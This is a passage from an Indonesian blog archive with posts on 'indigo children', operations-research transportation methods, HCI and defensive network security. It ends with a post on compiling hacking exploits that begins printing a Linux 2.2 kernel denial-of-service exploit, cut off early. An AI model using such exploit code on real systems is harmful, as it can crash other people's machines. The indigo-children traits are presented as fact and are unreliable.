B.     Konseptual. Lebih enjoy bekerja sendiri dengan proyek-proyek yang ia ciptakan sendiri. Contoh karir adalah sebagai arsitek, perancang, pilot, astronot, prajurit militer. Perilaku menonjol suka mengontrol perilaku orang lain.

C.     Artis. Tipe ini menyukai pekerjaan seni. Perilaku menonjol adalah sensitif, dan kreatif. Mereka mampu menunjukkan minat sekaligus dalam 5 atau 6 bidang seni, namun beranjak remaja minat terfokus hanya pada satu bidang saja yang dikuasai secara baik.

D.     Interdimensional. Anak indigo tipe ini di masa datang akan jadi filsuf, pemuka agama. Dalam usia 1 atau 2 tahun, orangtua merasa tidak perlu mengajarkan apapun karena mereka sudah mengetahuinya.

Ciri-ciri anak berbakat yang indigo:

  • Memiliki sensitivitas tinggi.
  • Memiliki energi berlebihan untuk mewujudkan rasa ingin tahunya yang berlebihan.
  • Mudah sekali bosan.
  • Menentang otoritas bila tidak berorientasi demokratis.
  • Memiliki gaya belajar tertentu.
  • Mudah frustasi karena banyak ide namun kurang sumber yang dapat membimbingnya.
  • Suka bereksplorasi.
  • Tidak dapat duduk diam kecuali pada objek yang menjadi minatnya.
  • Sangat mudah merasa jatuh kasihan pada orang lain.
  • Mudah menyerah dan terhambat belajar jika di awal kehidupannya mengalami kegagalan.
  • Apa yang harus dilakukan orangtua:
  • Hargai keunikan anak dan hindari kritikan negatif.
  • Jangan pernah mengecilkan anak.
  • Berikan rasa aman, nyaman dan dukungan.
  • Bantu anak untuk berdisiplin.
  • Berikan mereka kebebasan pilihan tentang apapun.
  • Bebaskan anak memilih bidang kegiatan yang menjadi minatnya, karena pada umumnya mereka tidak ingin jadi pengekor.
  • Menjelaskan sejelas-jelasnya (masuk akal) mengapa suatu instruksi diberikan, karena mereka tidak suka patuh pada hal-hal yang dianggap mengada-ada.
  • Jadikan sebagai mitra dalam membesarkan mereka.

 

Sumber:

http://www.kaskus.us/showthread.php?t=6423355

http://www.pasulukanlokagandasasmita.com/ciri-ciri-fisik-anak-indigo/

INDIGO (ciri-ciri dan definisi)

Modul Pemrograman Object Relation Mapping

•9 Januari 2012 • Tinggalkan sebuah Komentar

Silahkan Download Modul Praktikum Pemrograman Object Ralation Mapping, Semoga Bermanfaat……… ”

Klik Link ini,  Pemrograman Object relation Mapping

Metode Transportasi

•5 Januari 2012 • Tinggalkan sebuah Komentar

Metode Transportasi merupakan suatu metode yang digunakan untuk mengatur distribusi dari sumber­-sumber yang menyediakan produk yang sama ke tempat-­tempat yang membutuhkan secara optimal dengan biaya yang termurah. Alokasi produk ini harus diatur sedemikian rupa karena terdapat perbedaan biaya-­biaya alokasi dari satu sumber atau beberapa sumber ke tempat tujuan yang berbeda. Tabel awal dapat dibuat dengan dua metode, yaitu :

1.  Metode North West Corner (NWC) => dari pojok kiri atas ke pojok kanan bawah Kelemahan : tidak memperhitungkan besarnya biaya sehingga kurang efisien.

2.  Metode biaya terkecil => mencari dan memenuhi yang biayanya terkecil dulu. Lebih efisien dibanding metode NWC.

Setelah tabel awal dibuat, tabel dapat dioptimalkan lagi dengan metode:

1. Stepping Stone (batu loncatan)

2. Modified Distribution Method (MODI)

Selain metode-­metode di atas masih ada satu metode yang lebih sederhana penggunaannya yaitu metode Vogel’s Approximation Method (VAM). Contoh masalah transportasi:

dari          –             Ke

Gudang A

Gudang B

Gudang C Kapasitas pabrik
Pabrik W

Rp 20

Rp 5

Rp 8

90

Pabrik H

Rp 15

Rp 20

Rp 10

60

Pabrik P

Rp 25

Rp 10

Rp 19

50

Kebutuhan gudang

50

110

40

200

Penyelesaian:

1. Metode NWC

Biaya yang dikeluarkan :

(50 . 20) + (40 . 5) +( 60 . 20) + (10.10) + (40.19) = 3260

2. Metode biaya terkecil

………. Selanjutnya dapat anda Download File diatas : METODE TRANSPORTASI

Interaksi Manusia dan Komputer

•5 Januari 2012 • Tinggalkan sebuah Komentar

Pendahuluan
WYSIWYG (What You See Is What You Get) User Friendly = Ramah dengan Pengguna = kemampuan yang dimiliki oleh perangkat lunak atau program aplikasi yang mudah dioperasikan dan juga kemampuan lainnya yang membuat pengguna merasa betah dalam mengoperasikan program tersebut.

Antarmuka Manusia – Komputer
Input (Masukan) -> Process (Proses) ->  Output (Keluaran)

Ketika seseorang bekerja dengan sebuah komputer, ia akan melakukan interaksi dengan komputer menggunakan cara-cara tertentu. Cara yang umum digunakan adalah bahwa pengguna memberikan suatu perintah kepada komputer dan komputer menanggapinya dengan mencetak atau menuliskan tanggapan itu pada layar tampilan. Dari pola “Input -> Process -> Output” di atas, pengguna tidak tahu (atau tidak mau tahu) dengan proses yang sesungguhnya terjadi di dalam sistem komputer.

Dengan kata lain, melalui “masukan(input) dan keluaran(output) pengguna dan komputer saling berinteraksi. Agar pengguna dan komputer dapat saling berinteraksi hingga pengguna dapat merasakan adanya keramahan sistem komputer kepadanya, diperlukan suatu media yang memungkinkan interaksi tersebut berlangsung. Dengan dikembangkannya perangkat antarmuka berbasis grafis GUI (Graphical User Interface) memudahkan pengguna berinteraksi dengan program.

Tujuan Utama disusunnya berbagai cara interaksi manusia dan komputer adalah memudahkan manusia dalam mengoperasikan komputer dan mendapatkan berbagai umpan balik yang ia perlukan selama ia bekerja pada sebuah sistem komputer. Untuk merancang sistem yang ramah dan akrab dengan pengguna, para perancang harus memahami aspek psikologis yang dimiliki oleh pengguna, karena masing-masing pengguna memiliki ciri-ciri khusus dan kebiasaan
yang berlainan ketika mereka bekerja pada sebuah sistem komputer.

Selanjutnya dapat anda Download : Kuliah Interaksi Manusia dan Komputer

Meningkatkan Security Jaringan Komputer Anda

•23 Desember 2011 • Tinggalkan sebuah Komentar

            Situs Departemen Luar Negeri ‘dijebol’ hacker!!! Situs http://www.mil.id ‘diobrak-abrik’ hacker!!! Bagaimana bila hal ini terjadi pada jaringan komputer Anda ?

            Lalu lintas komunikasi data melalui Internet dengan TCP/IP-nya telah menjadi suatu kekuatan telekomunikasi yang sangat besar. Tiap jam, menit, hingga detik, data-data elektronik yang berharga lalu lalang dalam Internet tersebut. Tentunya hal tersebut menggugah inspirasi orang-orang tertentu untuk mencoba mendapatkan data-data tersebut. Hal ini menjadi ancaman serius bagi sekuriti di Internet. Untuk itu, kita harus lebih waspada terhadap usaha-usaha yang mengancam integritas data yang kita miliki. Tulisan ini mencoba memberikan alternatif sederhana kepada para pembaca yang hendak memahami masalah sekuriti di Internet. Pada bagian akhir, terdapat sebuah daftar singkat yang berisi tentang sumber-sumber dokumen maupun situs di Internet yang berkaitan dengan tulisan ini dan dapat dijadikan referensi untuk lebih mendalami masalah sekuriti di Internet.

            Secara umum, masalah sekuriti di Internet dapat dipandang dari dua sisi penting. Sisi pertama adalah integritas data yang dikirimkan melalui jaringan Internet (kita sebut saja integritas pengiriman data) dan sisi berikutnya adalah tingkat sekuriti dalam jaringan komputer itu sendiri (kita sebut sekuriti jaringan internal). Mari kita bahas satu-persatu dari sisi-sisi tersebut.

Integritas Pengiriman Data

            Pada saat kita mengirimkan data melalui jaringan Internet, kita selalu ingin agar data yang kita kirimkan tersebut sampai di tujuan dengan selamat dan tidak mengalami campur tangan pihak lain. Syarat ini menjadi jauh lebih utama apabila data yang kita kirimkan tergolong kategori data rahasia.

            Pada saat kita kirimkan, data tersebut akan melalui berbagai jenis komputer, router, atau gateway dan melintasi berbagai macam media fisik komunikasi. Kita mempertaruhkan integritas data kepada keanekaragaman di atas. Tentunya kita tidak mungkin memeriksa tingkat sekuriti di setiap hop/titik yang dilalui oleh data tersebut karena tingkat sebaran dan kepemilikan hop yang sangat beraneka ragam. Salah satu solusi yang dapat diterapkan adalah enkripsi data. Tujuan utama dari solusi ini adalah mencegah terjadinya curi-dengar (eavesdropping) terhadap data yang kita kirimkan maupun yang kita terima. Jika seorang “eavesdropper” melakukan tindakan curi-dengar, ia akan memperoleh data-data yang terenkripsi saja sehingga tidak mencerminkan isi data yang sebenarnya.

            Proses enkripsi data bisa diterapkan di lapisan (layer) tertentu dari protokol TCP/IP. Seperti yang telah diketahui, protocol TCP/IP memiliki 4 (empat) lapisan guna menunjang proses komunikasi data. Lapisan tersebut terdiri dari Application Layer, Transport Layer, Internet Layer, Network Access Layer. Kita bisa menerapkan proses enkripsi di masing-masing lapisan tersebut. Masing-masing implementasi dari lapisan-lapisan tersebut adalah sebagai berikut :

  • Network Access Layer

            Bentuk nyata dari lapisan ini adalah bagian hardware dari sebuah komputer. Bila kita akan menerapkan proses enkripsi di lapisan ini, maka kita harus mencari atau menciptakan hardware khusus yang menangani masalah enkripsi data. Beberapa lembaga penelitian telah mulai menggali lebih dalam kemungkinan penciptaan hardware yang memiliki kemampuan enkripsi data yang lebih baik.

  • Internet Layer

            Dalam protokol TCP/IP, Internet layer diimplementasikan dalam Internet Protocol (IP). Protokol ini berbentuk software yang mengatur tentang pengalamatan dan proses routing. Protokol ini telah diberikan nilai tambah tersendiri untuk meningkatkan sekuriti data yang dikirimkannya. Nilai tambah tersebut masing-masing adalah Authentication Header dan Encapsulating Security Payload.

Authentication Header (AH) adalah sebuah header tambahan yang bertujuan untuk memberikan jaminan atas syarat integritas data yang dikirimkan dan syarat keaslian sumber pengirim beserta data yang dikirimkan (authentication). Header ini berada di posisi paling akhir dari header-header pada lapisan IP dan sebelum header Encapsulating Security Payload (ESP). AH juga bisa menjamin non-repudiation dari sebuah data apabila penerapan AH menggunakan algoritma kriptografi tertentu. Non-repudiation adalah syarat dimana pihak penerima bisa membuktikan bahwa pihak pengirim benar-benar mengirimkan data yang diterima pihak penerima meskipun pihak pengirim tidak mengakuinya. Informasi yang terkandung di dalam AH ini dihasilkan dari perhitungan seluruh bagian dari datagram IP (mulai dari header IP, header protokol di atas IP, hingga data aslinya). Bila pihak penerima menerima datagram yang tidak otentik berdasarkan penilaian AH, datagram tersebut akan diabaikan. Mekanisme ini bisa digunakan untuk mencegah aksi-aksi IP spoofing. Aksi ini bertujuan agar penyusup bisa berpura-pura sebagai pihak pengirim dengan cara menebak datagram yang akan dikirimkan.

Encapsulating Security Payload (ESP) adalah sebuah mekanisme tambahan pada datagram IP yang bertujuan untuk meningkatkan confidentiality dan integritas data. Confidentiality adalah suatu syarat dimana penerima mengetahui arti yang sebenarnya dari data yang dikirimkan sedangkan pihak lain yang tidak diharapkan tidak akan mengerti arti yang sebenarnya dari data yang dikirimkan. Hasil implementasi ESP ini adalah sebuah datagram IP yang bagian datanya telah terenkripsi. ESP diletakkan di posisi paling akhir dari serangkaian IP header dan sebelum bagian pertama data. ESP memiliki header tersendiri yang disebut ESP Header. Untuk modus paling aman, format ESP Header adalah awal dari header tersebut tidak dienkripsi sedangkan sisa header dan seluruh bagian data dienkripsi.

|<—-     Tidak dienkripsi      —->|<—–    Dienkripsi    ——>|

+————+——————-+————+———————–+

| IP Header  | IP Header lainnya | ESP Header | data yang dienkripsi  |

+————+——————-+————+———————–+

Bagian header yang tidak dienkripsi memberikan keterangan tentang cara mendekripsi dan memroses data yang dienkripsi tersebut. ESP dapat diterapkan pada setiap jenis transport layer (TCP, UDP) yang digunakan. Mekanisme ini lebih banyak diterapkan untuk modus Tunnel. Modus Tunnel adalah sebuah modus pada pengiriman data yang lebih bersifat privat dan khusus melalui jaringan Internet. Intranet adalah salah satu pengguna modus Tunnel tersebut terutama Intranet yang digunakan untuk menghubungkan cabang-cabang yang tersebar di berbagai daerah.

  • Transport Layer

            Dalam konsep TCP/IP, secara umum transport layer dibagi menjadi dua yaitu Transmission Control Protocol (TCP) dan User Datagram Protocol (UDP). Pada lapisan ini, belum begitu banyak mekanisme-mekanisme yang dikembangkan untuk menambahkan aspek sekuriti. TCP sendiri sudah memiliki rutin-rutin yang cukup kompleks dalam mengolah data yang ia terima.

  • Application Layer

            Lapisan ini adalah lapisan yang langsung berhubungan dengan user. Apa yang dilihat oleh user pada layar monitor komputer adalah tampilan dari Application Layer tersebut.

            Teknik-teknik yang digunakan untuk mengenkripsi data pada lapisan aplikasi ini telah banyak berkembang dan mencapai hasil yang cukup memuaskan. Berbagai macam jenis algoritma enkripsi telah dikembangkan dan beberapa di antaranya telah menjadi standar internasional. Beberapa algoritma yang cukup terkenal adalah Data Encryption Standard (DES), Triple-DES, RC2/RC4International Data Encryption Algorithm (IDEA) dan Skipjack. Algoritma DES  dan IDEA telah banyak diterapkan di dunia sedangkan algoritma lainnya telah dipatenkan. Dari algoritma-algoritma di atas, dibuatlah berbagai macam software pengenkripsi. Salah satu yang terkenal dan bersifat shareware adalah Pretty Good Privacy (PGP).

            Penerapan software enkripsi pada Application layer bisa bermacam-macam. Salah satunya, kita bisa mengenkripsi isi dari eletronic mail yang kita buat sebelum kita kirimkan. Selain itu, kita juga bisa mengenkripsi file-file yang akan kita berikan kepada orang lain melalui FTP. Pesan-pesan elektronik pun dapat kita enkripsi terlebih dahulu sebelum kita kirimkan. Setelah sampai di tujuan, penerima dapat mendekripsi pada layer yang sama apa yang ia terima sehingga mencerminkan arti yang sebenarnya.

            Khusus dalam HyperText Transfer Protocol (HTTP), telah dikembangkan berbagai macam mekanisme pengamanan data yang ditransfer melalui protokol ini. Protokol HTTP menjadi tulang punggung dalam World Wide Web (WWW) dan kita lebih sering melihatnya dalam bentuk homepage di situs-situs Internet. Beberapa perusahaan di dunia telah memanfaatkan WWW sebagai salah satu saran penghubung kepada konsumen dan pelanggan mereka. Bahkan WWW telah pula digunakan sebagai penghubung antar bagian perusahaan mereka sendiri dalam teknologi Intranet. Untuk menjamin integritas data yang dikirimkan, para pakar kriptografi telah mengembangkan beberapa mekanisme enkripsi untuk protokol tersebut. Dua dari berbagai mekanisme yang ada di Internet adalah SecureHTTP (SHTTP) dan Secure Socket Layer (SSL). SSL dikembangkan oleh Netscape dan telah diimplementasikan di beberapa situs di Internet. Dengan adanya mekanisme-mekanisme ini, pengiriman nomor rekening, kata kunci rahasia, dan data-data rahasia lainnya bisa dilakukan di Internet dengan lebih aman.

Sekuriti Jaringan Internal

            Sisi selanjutnya adalah keamanan dari jaringan komputer internal. Pada saat kita memutuskan untuk membangun sebuah jaringan komputer yang terhubung ke Internet, saat itu pula kita telah mengambil resiko untuk berhadapan dengan ancaman-ancaman penyusupan dan pengrusakan data dari Internet. Oleh karena itu, kita harus mempersiapkan jaringan komputer kita dengan sebaik mungkin untuk menghadapi serangan-serangan dan ancaman-ancaman tersebut.

            Masalah sekuriti jaringan internal ini meliputi beberapa aspek. Untuk mudahnya, masalah tersebut dapat dipecah menjadi dua bagian yaitu bagian software-hardware dan bagian user.

  • Bagian software-hardware

            Dalam membangun sebuah jaringan komputer, kita memiliki kebebasan dalam merancang, baik dari struktur jaringan maupun konfigurasi hardware dan jenis program yang akan digunakan. Struktur jaringan yang akan direalisasikan dapat dirancang sedemikian rupa sehingga memiliki tingkat sekuriti yang tinggi. Sebagai contoh, kita bisa membuat sebuah jaringan perimeter atau lebih dikenal dengan sebutan DeMilitary Zone (DMZ) yang memberikan layanan dan akses seperlunya saja kepada Internet. Jaringan perimeter ini merupakan jaringan yang langsung berhadapan dengan Internet setelah melalui sebuah router atau gateway.

Dari segi hardware, kita dapat menentukan spesifikasi hardware yang tepat sesuai kebutuhan dan tugas yang akan diberikan kepada hardware tersebut. Sebagai contoh, untuk menjadi sebuah mail server yang menangani 100 buah mailing list atau lebih, tentunya kebutuhan akan jumlah memory/RAM dan swap memory yang disediakan menjadi melonjak. Selain itu, bila terdapat usaha-usaha pengrusakan pada mail server tersebut dengan berbagai cara seperti mail bombing, setidak-tidaknya mail server kita masih bisa bertahan.

Pada bagian software, kita bisa menggunakan sistem operasi dan software-software yang telah dikenal kehandalannya. Hal ini bertujuan supaya sistem operasi maupun software yang kita gunakan mampu menahan gempuran atau serangan dari Internet dan tidak sampai merusak hardware. Selain itu, sebaiknya kita selalu menggunakan software-software keluaran terbaru. Untuk itu, kita harus lebih sering memantau perkembangan software yang kita gunakan tersebut.

Setelah kita memilih sistem operasi dan software yang akan digunakan, kita harus mengkonfigurasi sistem operasi dan software tersebut agar tidak memiliki hole-hole yang bisa dieksplorasi oleh para penyusup dari Internet. Apabila kita tidak waspada, hole-hole yang sudah umum pun bisa muncul pada sistem jaringan komputer kita. Berikut ini terdapat beberapa titik penting pada sistem operasi berbasis Unix yang perlu mendapat perhatian.

  • Perintah-perintah berawalan huruf  “r”

            Perintah-perintah berawalan huruf “r” (rlogin, rsh, rwho, dlsb) perlu ditinjau ulang dari segi kebutuhan. Apabila kita tidak memerlukan fungsi-fungsi perintah di atas maka kita matikan perintah-perintah tersebut. Jika kita memerlukannya, kita harus lebih hati-hati dalam mengkonfigurasi file-file yang berhubungan dengan setting perintah-perintah tersebut. Untuk perintah-perintah tersebut, file konfigurasi yang penting adalah /etc/hosts.equiv.

  • File-file dengan suid

            File dengan konfigurasi suid adalah file (umumnya berupa program) yang apabila dieksekusi akan memiliki hak setingkat dengan pemilik (owner) dari file tersebut. Sebagai contoh, perintah “chpass” termasuk jenis file suid. Perintah “chpass” ini berguna untuk merubah data-data tentang user seperti: nama lengkap, alamat kantor, alamat rumah, dlsb. Pada dasarnya, perintah “chpass” ini melakukan perubahan pada file yang berisi  user password  dari komputer tersebut. Oleh karena itu, perintah tersebut memerlukan konfigurasi suid root karena file yang berisi user password hanya bisa diubah oleh root   sendiri atau memiliki hak akses setara dengan root. File-file dengan suid root harus dibatasi jumlahnya sesuai kebutuhan. Bila tidak, para penyusup bisa memanfaatkan kelemahan ini untuk memperoleh hak akses setara root pula. Seringkali para penyusup menyiapkan backdoor melalui file-file suid tersebut sehingga saat penyusup ingin kembali masuk ke dalam sistem, ia bisa menggunakan backdoor tersebut. Salah satu langkah penanggulangannya adalah dengan membuat daftar file suid di saat setelah konfigurasi sistem operasi selesai dan melakukan pemeriksaan secara rutin yang kemudian dibandingkan dengan daftar file pertama.

  • File & directory permission

            Pada saat mengkonfigurasi sistem operasi, file permission dan directory permission sebaiknya ikut dikonfigurasi lebih lanjut selain konfigurasi awal yang telah disediakan dari pencipta sistem operasi tersebut. Batasi user hanya untuk bisa memiliki akses penuh pada home directory user tersebut.

  • Network File System (NFS)

            NFS memungkinkan kita membuat file system yang berada di komputer lain seolah-olah berada di komputer kita. Tetapi, apabila kita kurang hati-hati dalam mengkonfigurasi-nya, hal ini menjadi makanan empuk bagi para pengrusak. Kita harus memilih direktori mana saja yang perlu dibuat menjadi terbuka terhadap komputer lain. Hak akses juga harus menjadi perhatian sehingga kita dapat menempatkan file-file pada porsi yang sebenarnya. Perbaikan-perbaikan (patches) untuk NFS juga telah tersedia di Internet karena NFS memiliki beberapa titik kelemahan.

  • majordomo

            Majordomo adalah salah satu software yang menangani mailing list dan sudah tersebar sangat luas. Gunakan selalu majordomo versi di atas 1.91 karena versi di bawah 1.91 memiliki bugs yang cukup berbahaya.

  • Fingerd

            Utilitas ini sudah cukup terkenal sebagai salah satu alat utama dalam Internet worm yang sempat melumpuhkan jaringan Internet di tahun 1988. Hingga saat ini, utilitas finger masih sering digunakan sebagai langkah awal memantau sistem yang akan disusupi. Meskipun perbaikan-perbaikan terhadap bug yang ada di fingerd telah dilakukan, sebaiknya layanan ini ditutup untuk akses dari luar sehingga perintah finger hanya bisa dilakukan sebatas sistem atau komputer itu saja.

  • File /etc/inetd.conf

            File /etc/inetd.conf ini berisi konfigurasi service-service yang dijalankan oleh inetd. Sebaiknya file ini diatur pada mode 600 dan dimiliki oleh root. Selain itu, sebaiknya kita menutup layanan-layanan networking yang tidak kita perlukan. Konfigurasi awal dari instalasi sistem operasi seringkali membuka layanan-layanan networking yang tidak kita butuhkan.

  • Anonymous FTP

            Anonymous FTP disediakan bagi user umum untuk mendapatkan file-file yang kita publikasikan. Hal yang perlu diperhatikan dari sudut pandang sekuriti adalah konfigurasi hak akses yang diberikan pada direktori-direktori yang kita publikasikan. Selain itu, selalu gunakan versi terbaru untuk FTP daemon yang kita gunakan. Versi FTP daemon yang sudah lama memiliki perintah-perintah jarak jauh untuk meletakkan file ataupun membaca file yang berada di direktori selain direktori FTP tersebut.

  • SMTP Server

            SMTP server adalah server yang bertugas mengatur penghantaran electronic mail dari pengirim ke penerima. SMTP server yang sering digunakan adalah sendmail. Sendmail ini telah terkenal kehandalannya tetapi juga memiliki bugs yang bisa digunakan untuk mendapatkan hak akses setara root. Untuk meminimalkan resiko ini, selalu gunakan versi terbaru dari sendmail. Kita juga bisa menaikkan tingkat proses logging hingga tingkat/level 9. Pada tingkat tersebut, sendmail logger akan mendeteksi usaha-usaha eksploitasi terhadap kelemahan sendmail.

  • HTTP Server / Web Server

            Baru-baru ini, Web server merupakan salah satu titik eksploitasi yang paling terkenal. Dengan mengeksploitasi bugs yang ada di web server ini, para penyusup bisa mendapatkan hak akses setara root. Hal ini mengakibatkan data-data homepage yang ada di web server itu diacak-acak dan diganti sesuka hati penyusupnya. Untuk mencegah terjadinya hal ini, beberapa langkah pencegahan perlu diambil. Beberapa di antaranya yang cukup dominan:

  • Gunakan selalu HTTP daemon yang terbaru dan telah diketahui hingga saat ini belum memiliki bugs. Contoh: NCSA httpd versi 1.5.
  • Hilangkan script-script yang tidak perlu yang memerlukan akses ke file system. Umumnya, script-script tersebut disebut dengan Common Gateway Interface (CGI) script.
  • Lakukan konfigurasi sebaik-baiknya terhadap CGI script yang kita perlukan sebagai penghubung antara user dengan server.
  • Gunakan tapis (filter) untuk mendeteksi masukan-masukan yang diberikan oleh user terutama terhadap karakter-karakter yang berpotensi untuk merusak seperti: \n \r ( . , / ; ~ ! ) > | ^ & $ ` < %.

            Selain dari itu, kita bisa menggunakan software firewall untuk membatasi akses dan melakukan pemantauan terhadap aliran transfer data. Software firewall ada yang bersifat shareware dan komersial. Cara instalasi, penggunaan, dan konfigurasinya tidak dibahas pada tulisan ini karena topik tersebut cukup luas

            Dalam suatu sistem yang terproteksi cukup ketat, seringkali kita tidak bisa mengakses komputer kita dari jarak jauh. Untuk memenuhi kebutuhan tersebut tanpa harus mengorbankan tingkat sekuriti sistem, kita bisa menempuh dua cara. Cara pertama adalah merubah program yang bertugas menerima akses langsung dari luar sehingga kita bisa memonitor, mencatat maupun membatasi akses yang diberikan. Contoh program yang menerima akses langsung dari Internet adalah telnetd. Cara kedua adalah dengan menyiapkan hardware khusus yang bertindak sebagai perantara antara user dengan komputer.  Fungsi dari hardware khusus ini tidak berbeda jauh dengan software yang diubah pada cara pertama.

  • Bagian User

            Jika sisi software telah dikonfigurasi dengan baik, sisi user yang perlu mendapat perhatian. Seringkali, user pada suatu sistem memilih kata password yang mudah ditebak. Penulis pernah mencoba beberapa password account yang isinya mudah ditebak, antara lain: “Komputer”, “Memori”,  kombinasi nama user, nama perusahaan penghasil meja komputer, merek monitor/keyboard/casing komputer, dlsb. Untuk itu, sebagai system administrator, kita perlu memberikan arahan dan anjuran kepada user untuk tidak menggunakan kata-kata yang mudah ditebak sebagai password. Selain itu, jangan menuliskan password pada kertas atau benda apa pun. Walaupun dalam film “War Games” (sebuah film yang cukup terkenal di kalangan hacker di Amerika) telah ditunjukkan akibat penulisan password tetapi masih saja terdapat user yang menuliskan password-nya. Tentunya sudah cukup banyak tips untuk membuat password yang baik. Jika dipandang perlu, konfigurasi password user bisa diatur agar user diharuskan memperbaharui password-nya secara periodik. Cara lain yang bisa dilakukan adalah menjalankan program yang berfungsi memecahkan kode password pada file password yang Anda miliki. Program semacam ini cukup banyak di Internet dan tersedia untuk berbagai platform sistem operasi. Pada sistem operasi Unix, program yang cukup terkenal adalah Crack. Dengan menggunakan program ini, kita dapat mengetahui apakah user telah memilih password dengan baik.

Langkah lain yang bisa kita lakukan adalah mencari dan mendapatkan software-software khusus yang berhubungan dengan masalah sekuriti. Contohnya antara lain: COPS (software penganalisa kelemahan dalam password dan konfigurasi file), SATAN (software penganalisa jarak jauh terhadap usaha-usaha penyusupan dari luar), TCP-Wrapper (software yang bertugas mencatat beberapa aktivitas transfer data),  Tripwire (mirip dengan TCP-Wrapper), dlsb. Dengan adanya software ini, kita bisa mengetahui hingga seberapa tinggi tingkat sekuriti sistem jaringan komputer kita.

Penanggulangan

            Jika  terjadi usaha-usaha penyusupan ke dalam sistem jaringan komputer, kita harus secepat mungkin menutup akses dari mana usaha-usaha penyusupan tersebut. Beberapa ciri-ciri dasar dari usaha-usaha penyusupan adalah usaha login yang gagal terus-menerus, sumber daya komputer yang terserap habis akibat satu atau lebih layanan networking, munculnya file-file aneh yang asal-usulnya tidak diketahui, jebolnya password dari beberapa user, dlsb. Bila penyusup telah berhasil memasuki sistem komputer kita dan bisa memperoleh hak akses setara root, bisa dipastikan sistem komputer kita sudah tidak aman. Mengapa? Karena pada umumnya penyusup telah membuat backdoor yang cukup aman dan tersembunyi kecuali kita mengetahui setiap titik dari backdoor yang dibuat oleh penyusup tersebut dan kita bisa memusnahkannya. Bila kita tidak bisa menemukan backdoor tersebut, jalan teraman adalah instalasi ulang sistem operasi yang ada di komputer tersebut L.

            Sebagai system administrator yang baik, kita seharusnya selalu membaca log file yang banyak dihasilkan oleh program-program yang dieksekusi di komputer kita. Dengan membaca log file ini, kejadian-kejadian yang tidak diinginkan dapat dideteksi lebih dini.

            Akhir kata, “tiada gading yang tak retak”. Kita harus selalu waspada dengan kesalahan-kesalahan yang mungkin kita perbuat baik dengan sengaja maupun tidak yang baik secara langsung ataupun tidak langsung dapat mengancam sekuriti sistem jaringan komputer kita. Kita juga harus selalu meningkatkan tingkat keterampilan dan keahlian kita karena usaha-usaha eksplorasi yang dilakukan oleh para hacker, cracker, dan phreaker selalu lebih maju.

Daftar Sumber-sumber Dokumen dan Situs-situs di Internet yang berkaitan dengan masalah sekuriti di Internet

Dokumen:

  • Computer Security Basics, Deborah Russell & G.T. Gangemi Sr., © 1991 O’Reilly & Associates, Inc.
  • Pratical Unix Security, Simon Garfinkel & Gene Spafford, © 1991 O’Reilly & Associates, Inc.
  • Unix System Security: A Guide for Users and System Administrators, David A. Curry, © 1992 Addison-Wesley Professional Computing Series
  • Firewalls and Internet Security, William R. Cheswick & Steven M. Bellovin, © 1994 AT&T Bell Laboratories, Addison-Wesley Publishing Company
  • Building Internet Firewalls, Brent Chapman and Elizabeth Zwicky, © 1995 O’Reilly & Associates, Inc.
  • Pretty Good Privacy, Simon Garfinkel, © 1995 O’Reilly & Associates, Inc.
  • Dokumen berikut dapat diperoleh melalui ftp.ds.internic.net di direktori /rfc/:
    • RFC 931, Authentication Server, Michael St. Johns.
    • RFC 1244, Site Security Handbook, J. Paul Holbrook & Joyce K. Reynolds.
    • RFC 1281, Guidelines for the Secure Operation of the Internet, Richard D. Pethia & Stephen D. Crocker.
    • RFC 1508, Generic Security Service Application Program Interface, John Linn.
    • RFC 1750, Randomness Recommendations for Security, Donald E. Eastlake 3rd & Stephen D. Crocker.
    • RFC 1825, Security Architecture for the Internet Protocol, Randall Atkinson.
    • RFC 1826, IP Authentication Header, Randall Atkinson.
    • RFC 1827, IP Encapsulating Security Payload (ESP), Randall Atkinson.
    • RFC 2015, MIME Security with Pretty Good Privacy (PGP), Michael Elkins.
  • Beberapa dokumen yang terletak di ftp.cs.purdue.edu pada direktori /pub/spaf/ssecurity/ yang dapat diambil melalui anonymous ftp.
  • Orange Book & Red Book, part of The Rainbow Books, DoD Computer Security Center. Kedua dokumen tersebut terdapat di ftp.cert.org pada direktori /pub/info/orange-book.Z dan /pub/info/red-book.Z.

 

Software:

Crack, ftp://ftp.auscert.org.au/pub/cert/tools/crack/*

COPS, ftp://ftp.auscert.org.au/pub/cert/tools/cops/1.04

PGP, ftp://ftp.ifi.uio.no/pub/pgp/

SATAN, ftp://ftp.win.tue.nl/pub/security/satan*

Tiger, ftp://net.tamu.edu/pub/security/TAMU/tiger-2.2.3.tar.gz

TCP-Wrapper, ftp://ftp.win.tue.nl/pub/security/tcp_wrappers_7.6.tar.gz

Tripwire, ftp://ftp.auscert.org.au/pub/coast/COAST/Tripwire/*

Meng-compile Eksploit Dalam Bahasa C

•23 Desember 2011 • 1 Komentar

Pada saat penggembaraan kita dalam melakukan hacking sering kali kita memperoleh program (eksploit) yang dapat digunakan untuk mengeksploitasi sebuah sistem. Program ini tidak jarang berbentuk source code bukan executable dalam bahasa C yang perlu kita compile agar menjadi bentuk executable yang dapat dijalankan.

Di samping itu, cara belajar hacking yang terbaik adalah dengan mempelajari program orang lain yang telah sukses dalam melakukan hacking. Atau melihat struktur program yang ada. Di Linux, proses belajar ini menjadi sangat cepat karena sebagian besar source code Linux tersedia / terbuka & dapat kita lihat menggunakan teks editor biasa pada directory:

            /usr/src/linux

Tentunya sebelum melihat demikian banyak source code ada baiknya anda membaca-baca berbagai teknik yang berkaitan dengan kerja sistem operasi / Linux maupun kerja Internet yang di dokumentasikan dalam bentuk file Request For Comment (RFC) yang dapat di ambil secara gratis di berbagai situs Internet, seperti http://www.internic.net, http://www.linuxdoc.org dsb.

Contoh sebuah source code eksploit untuk Linux kernel 2.2-2.3.99 saya tampilkan berikut ini.

/*            [http://b0f.morphed.net] – eth0                */

/*                                                       */

/* Vulnerable

  Linux 2.2.12

  Linux 2.2.13

  Linux 2.2.14

  Linux 2.3.99-pre2

  The following exploit code will hang any Linux machine on various

  Pentium platforms.

  Note that this does not require any special privileges, and any user

  Can compile and run it, so watch out kiddies…

  The send system call immediately puts the kernel in a loop spewing

  kmalloc: Size (131076) too large forever

  (or until you hit the reset button).

  Apparently UNIX domain sockets are ignoring the

  /proc/sys/net/core/wmem_max parameter,

  despite the documentation to the contrary.

 

 [information provided by Jay Fenlason]

 [http://b0f.morphed.net]

 [buffer0verfl0w security]

*/

#include <sys/types.h>

#include <sys/socket.h>

#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )

{

struct sockaddr SyslogAddr;

int LogFile;

int bufsize = sizeof(buf)-5;

int i;

for ( i = 0; i < bufsize; i++ )

